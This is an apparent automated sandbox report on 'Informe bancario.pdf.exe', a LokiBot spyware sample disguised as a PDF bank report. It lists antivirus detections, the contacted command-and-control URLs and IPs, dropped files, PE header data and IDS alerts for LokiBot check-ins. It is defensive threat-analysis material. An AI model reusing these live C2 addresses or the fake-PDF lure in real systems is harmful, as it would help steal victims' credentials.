5.0.Informe bancario.pdf.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.0.Informe bancario.pdf.exe.400000.14.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.Informe bancario.pdf.exe.39dfee0.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.Informe bancario.pdf.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.0.Informe bancario.pdf.exe.400000.10.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.0.Informe bancario.pdf.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
kossa.xyz	10%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://kbfvzoboss.bid/alien/fre.php	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htmG	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	0%	URL Reputation	safe
http://www.goodfont.co.krF	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.goodfont.co.krZ	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/s	0%	URL Reputation	safe
http://www.tiro.comU	0%	Avira URL Cloud	safe
http://www.fontbureau.comm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://kossa.xyz/esi/pp/play.php	0%	Avira URL Cloud	safe
http://www.fontbureau.comce	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.sandoll.co.krE	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
kossa.xyz	172.67.154.72	true	true	10%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: safe	unknown
http://kossa.xyz/esi/pp/play.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.259547063.0000000005761000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	Informe bancario.pdf.exe, 00000000.00000002.294664129.0000000005750000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ibsensoftware.com/	Informe bancario.pdf.exe, Informe bancario.pdf.exe, 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htmG	Informe bancario.pdf.exe, 00000000.00000003.266552640.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.268164390.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267203188.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267404179.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266370808.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.268040307.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.265954001.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266622693.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.265897828.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266080343.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266290134.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266967198.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267554490.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266128541.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267148330.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267028927.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266471528.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267458378.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267763841.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266216146.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267060843.000000000578D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	Informe bancario.pdf.exe, 00000000.00000003.258511329.0000000005756000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.krF	Informe bancario.pdf.exe, 00000000.00000003.258511329.0000000005756000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.krZ	Informe bancario.pdf.exe, 00000000.00000003.258511329.0000000005756000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.netD	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/s	Informe bancario.pdf.exe, 00000000.00000003.260884494.0000000005752000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.tiro.comU	Informe bancario.pdf.exe, 00000000.00000003.257122280.000000000576B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comm	Informe bancario.pdf.exe, 00000000.00000002.294664129.0000000005750000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	Informe bancario.pdf.exe, 00000000.00000003.260884494.0000000005752000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comce	Informe bancario.pdf.exe, 00000000.00000002.294664129.0000000005750000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.krE	Informe bancario.pdf.exe, 00000000.00000003.258511329.0000000005756000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zhongyicts.com.cn	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.40.153	unknown	United States		13335	CLOUDFLARENETUS	true
172.67.154.72	kossa.xyz	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	651256
Start date and time: 23/06/202217:53:08	2022-06-23 17:53:08 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 7s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Informe bancario.pdf.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/3@46/2
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Successful, ratio: 17.3% (good quality ratio 8.8%) Quality average: 33.1% Quality standard deviation: 39.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
HTTP Packets have been reduced
TCP Packets have been reduced to 100
Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Execution Graph export aborted for target Informe bancario.pdf.exe, PID 6800 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:54:22	API Interceptor	44x Sleep call for process: Informe bancario.pdf.exe modified

Process:	C:\Users\user\Desktop\Informe bancario.pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

Download File

Process:	C:\Users\user\Desktop\Informe bancario.pdf.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Download File

Process:	C:\Users\user\Desktop\Informe bancario.pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbON:u
MD5:	89CA7E02D8B79ED50986F098D5686EC9
SHA1:	A602E0D4398F00C827BFCF711066E67718CA1377
SHA-256:	30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
SHA-512:	C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.605576053949014
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Informe bancario.pdf.exe
File size:	497664
MD5:	603fe9a434da79407213db7d4b907789
SHA1:	812797eae86b27f54e5caadb021a4c00c31e4a7e
SHA256:	07776cc1a0981b4143d63533a5e30f2deb4f545f4d27544cda60f5d07b602593
SHA512:	1e18fd13addd394ed2fddc401e48d111f5da9c2119cf96a57377623e77fd7ca26a51cf49cfc543b0e012303a31d9dd666e397b6ffca858fffebe50417e332d18
SSDEEP:	12288:TpkPRxliW1CCQo4gg4kX5B2tA6fIVeZJPhLn8Nc5UDceiGk:lkPRrhLvLkX50MeZJpLna2UDuR
TLSH:	CAB4E1E4E3A45EABD843D3BC587C811427A7FB4AC4ACD6057CF6748AA5B23E55093E03
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............0.................. ........@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x47adbe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x62B4812E [Thu Jun 23 15:05:18 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7ad6c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7c000	0x444	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x78dc4	0x78e00	False	0.809062338417787	data	7.621462978207712	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x7c000	0x444	0x600	False	0.2805989583333333	data	2.4690099230174813	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7e000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x7c058	0x3e8	data

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.3172.67.154.7249744802025381 06/23/22-17:54:38.472164	TCP	2025381	ET TROJAN LokiBot Checkin	49744	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249767802024313 06/23/22-17:54:57.914899	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49767	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349836802021641 06/23/22-17:55:40.617404	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49836	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349843802025381 06/23/22-17:55:45.763232	TCP	2025381	ET TROJAN LokiBot Checkin	49843	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249746802021641 06/23/22-17:54:42.346945	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49746	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249749802024313 06/23/22-17:54:47.375834	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49749	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249767802024318 06/23/22-17:54:57.914899	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49767	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249770802024313 06/23/22-17:55:02.423254	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49770	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349745802025381 06/23/22-17:54:39.886492	TCP	2025381	ET TROJAN LokiBot Checkin	49745	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249844802021641 06/23/22-17:55:50.553165	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49844	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249749802024318 06/23/22-17:54:47.375834	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49749	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249762802025381 06/23/22-17:54:52.263394	TCP	2025381	ET TROJAN LokiBot Checkin	49762	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249773802021641 06/23/22-17:55:09.049678	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49773	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249877802021641 06/23/22-17:56:13.789082	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49877	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349876802024318 06/23/22-17:56:11.073086	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49876	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349876802024313 06/23/22-17:56:11.073086	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49876	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349778802025381 06/23/22-17:55:15.087771	TCP	2025381	ET TROJAN LokiBot Checkin	49778	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249859802021641 06/23/22-17:55:58.152468	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49859	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249771802024318 06/23/22-17:55:04.009923	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49771	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249768802024318 06/23/22-17:54:59.413778	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49768	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349876802025381 06/23/22-17:56:11.073086	TCP	2025381	ET TROJAN LokiBot Checkin	49876	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349835802021641 06/23/22-17:55:36.607918	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49835	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349775802021641 06/23/22-17:55:12.061012	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49775	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349780802024318 06/23/22-17:55:16.534873	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49780	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249875802024313 06/23/22-17:56:08.656582	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49875	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249768802024313 06/23/22-17:54:59.413778	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49768	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249816802021641 06/23/22-17:55:26.329557	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49816	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249875802024318 06/23/22-17:56:08.656582	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49875	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249743802025381 06/23/22-17:54:37.108830	TCP	2025381	ET TROJAN LokiBot Checkin	49743	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249771802025381 06/23/22-17:55:04.009923	TCP	2025381	ET TROJAN LokiBot Checkin	49771	80	192.168.2.3	172.67.154.72
